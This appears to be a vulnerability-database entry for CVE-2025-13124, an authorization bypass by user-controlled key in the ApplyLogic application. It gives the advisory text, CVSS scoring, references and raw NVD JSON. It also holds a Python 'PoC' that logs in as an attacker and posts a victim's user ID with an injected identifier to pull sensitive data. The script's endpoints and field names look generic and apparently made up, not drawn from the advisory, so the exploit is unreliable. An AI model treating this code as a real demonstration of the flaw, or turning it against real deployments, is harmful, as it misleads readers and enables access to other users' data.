CVE-2025-13124

Description

Authorization Bypass Through User-Controlled Key vulnerability in Netiket Information Technologies Ltd. Co. ApplyLogic allows Exploitation of Trusted Identifiers.This issue affects ApplyLogic: through 01.12.2025.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

ApplyLogic < 01.12.2025

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13124 PoC - Authorization Bypass Through User-Controlled Key # Affected: ApplyLogic through 01.12.2025 # Author: [email protected] import requests import json TARGET_URL = "http://target.com/ApplyLogic" ATTACKER_ID = "attacker_controlled_id" TARGET_USER_ID = "victim_user_id" def exploit_authorization_bypass(): """ This PoC demonstrates the Authorization Bypass vulnerability where an attacker can manipulate user-controlled keys to bypass authentication. """ headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Step 1: Normal login to obtain initial session login_data = { "username": "[email protected]", "password": "attacker_password" } print("[*] Step 1: Authenticating as attacker...") login_response = requests.post( f"{TARGET_URL}/api/auth/login", json=login_data, headers=headers ) if login_response.status_code != 200: print("[-] Login failed") return False session = login_response.json().get("session_token") print(f"[+] Obtained session: {session}") # Step 2: Exploit the vulnerability by injecting trusted identifier # The vulnerability allows manipulation of user-controlled keys exploit_data = { "user_id": TARGET_USER_ID, "session_token": session, "action": "access_sensitive_data", # Attacker-controlled key that bypasses authorization "trusted_identifier": ATTACKER_ID } print(f"[*] Step 2: Exploiting authorization bypass...") print(f"[*] Injecting trusted identifier: {ATTACKER_ID}") exploit_response = requests.post( f"{TARGET_URL}/api/resource/access", json=exploit_data, headers=headers ) if exploit_response.status_code == 200: print("[+] Authorization bypass successful!") print(f"[+] Response: {exploit_response.text}") return True else: print(f"[-] Exploit failed with status: {exploit_response.status_code}") return False if __name__ == "__main__": exploit_authorization_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13124
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13124
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13124/
[4] VulDB https://vuldb.com/cve/CVE-2025-13124
[5] https://www.usom.gov.tr/bildirim/tr-25-0447

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13124", "sourceIdentifier": "[email protected]", "published": "2025-12-11T15:15:46.680", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Netiket Information Technologies Ltd. Co. ApplyLogic allows Exploitation of Trusted Identifiers.This issue affects ApplyLogic: through 01.12.2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0447", "source": "[email protected]"}]}}